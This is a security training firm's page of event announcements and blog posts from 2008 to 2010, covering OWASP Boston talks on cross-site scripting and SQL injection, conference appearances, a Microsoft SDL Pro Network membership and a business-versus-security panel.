In the second installment of Safelight’s Lightning Talk series, Rob Cheyne will present the basics of cross-site scripting (XSS) at OWASP Boston.

He will cover the two primary methods of XSS attack, reflected and persistent, as well as provide detailed demonstrations that show how an attacker would use these methods in the real world.

 

As part of the demo, Rob will go beyond proof of concept and present an example of a “weaponized” JavaScript that could be used to steal another user’s session information.

 

Rob will also offer practical tips for defending against cross-site scripting flaws in your own applications.

 

When: June 2, 2010

Time: 6:30 p.m.

Where: Microsoft offices at the Waltham Weston Corporate Center, 201 Jones Rd., Sixth Floor Waltham, MA

IT Security Education Key to Defending Against OWASP Top 10 Most Critical Web Application Vulnerabilities

In the first of the Safelight Security Advisors Lightning Talk Series, CEO Rob Cheyne will discuss “An Introduction to SQL Injection,” at the Open Web Application Security Project (OWASP) Boston chapter meeting, Monday, May 3.

Rob will cover the methodology used by professional attackers, along with detailed demonstrations of one of the most common and dangerous OWASP Top 10 issues.

After demonstrating how SQL injection can be used to run system commands and gain root access on a database server, Rob will provide practical tips for defending against SQL injection flaws.

Safelight’s Lightning talks are designed for members newer to OWASP interested in understanding the basics of web application security, although everyone should feel free to attend.

When: May 3, 2010, with subsequent meetings typically the first Wednesday of the month

6:30 – 7:00 p.m. Networking 7:00 – 9:00 p.m. Main Presentations Join the Boston mailing list.

RSA 2010 Conference

March 1-3

Moscone Center

San Francisco, CA

Join Safelight at Booth #2058 to see the latest in information security training, including our newest online learning programs. Attend our customer presentation, Banking on Security Education with State Street Bank’s Vice President Jeff Richard, and cocktail reception from 6:00 -8:00 p.m. at The St. Regis Hotel to hear how this leading financial institution rolled out a comprehensive security training program for thousands of developers worldwide. You must register for this event in advance in order to attend.

Safelight’s CEO Rob Cheyne will present a webcast for the Microsoft SDL Pro Network community on “New Technology Wearing Hand-Me-Down Vulns,” February 25, 2010 from 1:00-1:30 p.m. EDT.

Using a web service as an example, Rob will demonstrate how classic vulnerabilities can crop up in new technologies and how applying SDL principles can help build secure systems. Register for the Webcast.

At BlackHat DC 2010, Safelight Security Advisors today became a training member of Microsoft’s Security Development Lifecycle (SDL) Pro Network. Microsoft created the SDL Pro Network to help development organizations adopt the SDL and address the challenges of embedding security and privacy into their software and development culture. As one of seven new members and the only training company selected among the latest group, Safelight joins a select network of industry leaders specializing in application security with significant experience in secure development lifecycle methodologies.

“Microsoft is happy to have SafeLight join the SDL Pro Network.  We believe training is a cornerstone to the SDL and SafeLight can help train developers on secure coding practices,” said David Ladd, Principal Security Program Manager, Microsoft’s Trustworthy Computing Group.

As part of the SDL Pro Network, Safelight looks forward to continuing the mission of training students on a disciplined process that’s proven to reduce vulnerabilities and lower the total cost of development. Safelight’s instructor-led and online learning programs helps companies incorporate security best practices into their development initiatives, offering security education courses that cover all phases of the SDL:

• Introduction to the Microsoft Development Lifecycle
• Application Security Fundamentals
• Architecting Secure Systems
• Language-Specific & Language-Agnostic Secure Coding
• Testing for Secure Systems
• Managing a SDL (for project managers and team leaders)
• Risks of Insecure Applications (for business owners and executives)

Visit Safelight’s SDL Pro Network page at http://securityadvisors.com/sdl to learn more about our offerings.

Read Microsoft’s announcement on the new SDL Pro Network members in their press room.

Safelight’s CEO Rob Cheyne will present, “Banking on Education: A Case Study on Developer Security” at CSI 2009 on Tuesday, October 27, 2009 from 9:45-10:45 a.m.

Learn how Safelight Security Advisors helped a major U.S. bank create security training for its internal developers: both employees and contractors located in multiple countries. Attendees will learn ways to shift the mindset of this critical audience, leaving with ideas they can start to implement themselves.

CSI 2009 features a comprehensive program, covering 18 main topic areas, to provide the security knowledge needed to succeed in today’s environment. To attend, visit http://csiannual.com.

I am currently preparing for the Business vs. Security panel that I am moderating at the Source:Boston conference on Wednesday, March 11th from 4:15-5:30pm.

You can read about it here . Click the link that says "The end of our rope: the ongoing tug-o-war between business and security", The gist is that we get two business people and two security people together, and they discuss the finer points of managing business and security requirements in real-world environments. Many of us have been there. Security people have a notoriously difficult time convincing the business that security is important, and business folks are just trying to run the company and often view security as a speed bump.

I’m very excited to moderate this panel two years in a row. It is relatively rare to get security and business people together at one table with the sole purpose of discussing how security impacts real-world decisions. As they say on TV, "Let’s get ready to rumble!"

How you can help

Below are some examples of questions I could ask the panelists. I have a much longer list, but I think it would be much more interesting to open this up to the security community. So, given this opportunity, what questions would YOU like me to ask the panelists?

Sample questions:

• When you are ’selling’ security, how do you get appropriate attention when you are talking about what MIGHT happen instead of things that ARE happening? You are essentially asking people to spend money on a problem that "THEY DON’T HAVE". How do you justify the expense?
• Whose responsibility IS it to manage security?
• With security, it is possible to spend an unknown amount of money on an intangible problem. What is the right amount to spend?
• As an industry, security people tend to NOT be very good at communicating security concepts to NON security people. How do you communicate technical security concepts to business people in a way that they get it?

See you at the conference!
–rob

Banking on Education: A Case Study on Developer Security Training

Speaker: Paul Hinkle (Chief Technology Officer, Safelight Security Advisors)
Date/Time: Friday (March 13, 2009) 1:30pm — 3:00pm
Track: Security
Presentation Format: 90-minute Case Studies
Audience level: All

Presentation Abstract

Four years in the making, State Street Bank has created a pioneering security education program for its internal developers: both employees and contractors located in multiple countries. This case study will discuss how to properly implement an internal security training program. It will discuss the unique challenges State Street faced, how they were addressed, and the process the company went through to create a successful training program that is now mandatory for all staff involved in systems development worldwide.

Please email info@securityadvisors.com for a discount code to receive $100 off the lowest price.

Educates IT and developers on latest threats and how to secure Web applications

What: Conference on California’s Future
When: May 12-16, 2008

Sacramento Convention Center
1400 J Street Sacramento, California 95814

Instructor: Paul Hinkle, CTO, Safelight Security Advisors

Security Training

Threat Update

Monday, May 12, 2008, 9:00 a.m. – 12:00 p.m.

Audience: IT network administrators and managers

The news is full of stories of stolen laptops, hacked databases and identity theft on a massive scale. From social engineering and spam, to directed attacks and virtualized rootkits, learn how different threats may impact the overall security posture of your organization. This half-day course brings you up to date with the latest attack methods, and anticipates some of the changes the industry expects in the near future.

Securing your Web Applications

Monday, May 12, 2008, 1:30 p.m. – 4:30 p.m.

Audience: application developers, project managers and business analysts

According to Acunetix (a vendor of Web application scanning tools), 70% of applications they reviewed contained high or medium ranked security vulnerabilities. Learn how to develop more secure applications using simple, repeatable steps. This introductory half-day session includes: demonstrations of key attacks, step-by-step analysis of those attacks and solid countermeasures that any development team can use in its Web environment.

I am out at the RSA Conference this week, and like every year, I am stunned by the number of product vendors selling “silver bullet” technology solutions to solve all of life’s security problems. Seeing the make-up of the expo floor, you would think that you can just throw lots of technology at a problem in order to make it go away. Given that real solutions always incorporate people, process and technology, it always amazes me that most vendors pretty much ignore the first two. (more…)